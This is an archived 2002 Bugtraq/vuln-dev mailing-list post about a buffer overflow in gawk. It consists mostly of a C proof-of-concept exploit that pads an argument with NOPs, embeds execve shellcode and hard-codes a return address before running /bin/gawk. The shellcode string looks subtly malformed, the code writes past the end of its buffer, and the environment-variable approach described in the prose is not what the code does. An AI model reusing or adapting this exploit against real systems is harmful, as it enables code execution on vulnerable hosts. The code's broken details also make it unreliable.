about gawk
From: Gabriel A. Maggiotti (gmaggiot@ciudad.com.ar)
Date: 03/15/02

Date: Fri, 15 Mar 2002 15:24:21 -0300
From: "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar>
To: research-list@qb0x.net, bugtraq@securityfocus.com, vuln-dev@securityfocus.com
I did a little research, and found that it only accepts ASCII chars as arg,
and if you try to put a shellcode in the arg nothing occurs.
I think if we store the shellcode in an env variable and write the ret
address pointing to the env shellcode, it could work. I attach a proof I made.
/*
---------------------------------------------------------------------------
Web: http://qb0x.net Author: Gabriel A. Maggiotti
Date: March 15, 2002 E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------
*/
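#include <stdio.h>
#include <string.h>   /* memcpy, strlen */
#include <unistd.h>   /* execl */

#define OFFSET 18215
#define NOP 0x90
#define RET_72 0xbfffc6f0
#define RET 0x41

int
main(int argc, char *argv[])
{
    int i = 0;
    char buf[OFFSET];
    int c, ret;
    char shellcode1[] =
        "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
        "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69/bin/ls";

    ret = RET_72 - OFFSET;

    /* fill the whole argument buffer with NOP bytes */
    for (i = 0; i <= OFFSET - 1; i++)
        buf[i] = NOP;

    /* place the RET marker value after the fill */
    *(int *) &buf[i] = RET;

    /* copy the payload bytes into the buffer at offset 131 */
    memcpy(buf + 131, shellcode1, strlen(shellcode1));

    /* the argument starts with "-f " so gawk treats the rest as a file name */
    buf[0] = '-';
    buf[1] = 'f';
    buf[2] = ' ';

    execl("/bin/gawk", "/bin/gawk", buf, NULL);
    //puts(buf);
    return 0;
}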